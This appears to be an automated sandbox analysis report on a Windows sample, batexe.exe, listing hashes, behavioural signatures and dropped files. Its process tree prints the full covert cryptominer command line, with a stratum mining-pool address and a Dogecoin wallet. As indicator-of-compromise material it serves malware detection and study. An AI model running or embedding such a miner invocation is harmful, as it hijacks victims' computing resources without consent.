Analysis
-
max time kernel
293s -
max time network
298s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
24-02-2024 01:09
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1164 b2e.exe 3068 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3068 cpuminer-sse2.exe 3068 cpuminer-sse2.exe 3068 cpuminer-sse2.exe 3068 cpuminer-sse2.exe 3068 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/3340-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3340 wrote to memory of 1164 3340 batexe.exe 87 PID 3340 wrote to memory of 1164 3340 batexe.exe 87 PID 3340 wrote to memory of 1164 3340 batexe.exe 87 PID 1164 wrote to memory of 2752 1164 b2e.exe 88 PID 1164 wrote to memory of 2752 1164 b2e.exe 88 PID 1164 wrote to memory of 2752 1164 b2e.exe 88 PID 2752 wrote to memory of 3068 2752 cmd.exe 91 PID 2752 wrote to memory of 3068 2752 cmd.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Users\Admin\AppData\Local\Temp\5C1A.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\5C1A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5C1A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5EF8.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3068
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.8MB
MD5b49798d339820278682e18694551ed5a
SHA17892b497fd23a511c73e3fecb623d308ea2500a7
SHA2569988b4f9caf0f85e5728599f3e5dd954ca2cb1cba2b505d794c2194d67c33950
SHA5127896cf36e9ccc2696577b639723b15b09c3932454525a24113181cccd121b1c07d709f10529efa21ac3c04823ed064568a9625ddc2c8fbd027648f6b74c1f1de
-
Filesize
2.5MB
MD512f425a4cfed97dded4b32efa7f2eae9
SHA19c117ac20a883da6a53bccf645f0b6d1aa152d8e
SHA2560ff860778aa7e9dab8651d8dabf09f6b660f51d81b6df57cd6a80b675452913c
SHA512bce606e6d98843d97a39440e168d234d1a234ed5690cfe02396d39330f3716c5edae3d321eddb6de3b563f6146e175772b1771e1b5b85a85d0d6b544e50eb828
-
Filesize
1.9MB
MD5c5fc3224e2f606dcdb4ef49ddff0f0bc
SHA1b7af54e7cf534462b562948bc894ac6cafe36ebf
SHA256e1d264a52b18e8f4bf1e73ed7aed3a0f26785e3fe9641eaa72fc6eaa4f024178
SHA5123b7974c97b6421ea6e31ef47a6432f1d6ea9b3e5b6dd9a1ae47083242b4cc97d3434f9bf44026c09a2fed07d7e6371070830f4b23b42b008b3da0bc65b95ec53
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.2MB
MD5c56729ea3bf95b66aee6823609d41ca1
SHA12098241ee0a01586f89da344afaa3cf49bc32a9f
SHA256bdfdd246edec07bd33fcea73e0722192474a1e55be970f41899330d570656fb5
SHA5126504021326f37219a899406bf8b72915fab040e37a31276e7e4419ce416a192f3c2018a35eeea30da9e48c7fe74fd162bf194641c913d32e2291b0384b2d482d
-
Filesize
890KB
MD57a00f5e2e1d3c50357d48c0aa55a1ac1
SHA1eb3d9e347bae352c07569191a1adde35761c3226
SHA25655ffa53254dab94c5bb737403cc2e3c407fa1daa2ebc844e1a34143b5bde8dc5
SHA512560916d2ff65959e190e5fa9741d99e8b93111642eb44a7376caba304ea0eb4f74d32f180dfc7e82ecccae45d8727b13096d5d982eb8995d867a43ff4f9fbdcf
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
651KB
MD5835d0bf340d814bb31752f727f39ead1
SHA129ac8bd5ed77272f2a1127239b46d62dfa2f5edb
SHA2562f4b2ce5eaa05b81617719f5f47536352b351e9ae2e54e1143d25193185676c3
SHA51272997d740f5ab3dc0d0e8e72bc862a08254ecba110a25589ac2e78d1b0c3152e67ddd705041218cdb4dffa65b4af99495d6645625be9117408b931e17fe63324
-
Filesize
542KB
MD5f345b036ae8024d4bb57efbcb304c821
SHA1ae5f234a6d3bec0ce5cabd13a64b9625e0f68529
SHA256e1b2fff4d7b21afab1f7dc999a01a9aaa5bd7d57385425e8321f9f87e77d2f25
SHA512727adcfaad39c3800242bba721cb159bf383d13287aed74e2e638e14590f76d46cc40d852f4f3fb36aaf0b209094fbb6c25c19c65d7adf5b5a5244df7b8b9c64
-
Filesize
991KB
MD5fdd4c310e34fe6b7cea7cf5ab8d109b3
SHA1e66c5905910d0bba32f52ddbdd9cb1f7ef73c6cf
SHA2565a8d8b44cc5cf139ecd220b77de95a44dacb4c4cadc4e1b26de736426d50b0c6
SHA5125e6a59b4883d01aa6192f4e1bb47ab13aeeba7d34c5b1dfe11478f15c90a0f07fbf5865879f242eb4c675bf9ba307008649696a891ea563d486c4d99503734c1
-
Filesize
591KB
MD575d92657d7fd2987b8fa2f60934be1d9
SHA107209952faa8fee6fe040e9524e06e020d8db021
SHA2565f0e919892346646fdc4296deb076e679bedae0645ce7b5a50e121d3420dbb51
SHA512f764e623b7ed2a557c67e9fee81ba7192fd739ca6197ea71ccba974b1bf262691ef5dc3db727f8339bfb0ef691af27b3178110beede5ab2ef054e30f9c6ea818
-
Filesize
652KB
MD5f24ecd6c3671d4d6a44e56cc0f00c5d9
SHA1b534380eb58d30253cb21908825fdb2ead546dd0
SHA256e3f3a557595168cfa1f4c102541428938eb90e3eee6785a9a1ef4da1b2737179
SHA512e5a506386ccbd73a0de251008646b04f2b5195ef32e6a306a7372d569e29a610bda5d0d0cd96d33a363db270b5e1cb44b7af68f70488cbf089a159ebc1e59673
-
Filesize
1.2MB
MD5701da267ba09a07791146a98b0cf11bb
SHA1c9ca78fa73d059c867ff6965381a87dfd3192f69
SHA256e3571b8af11883c9b767564f38ec0c0aaa57126b9a20be95e1d9d185ce73c5fe
SHA512e670ae7512534b960dea26cb20d9a29defd9b0072501aeda7dd5cb99300d89425d57fd8ff682f875d1f750cc01479c3ca4a726844294427454ac4fc50f8b95a7
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770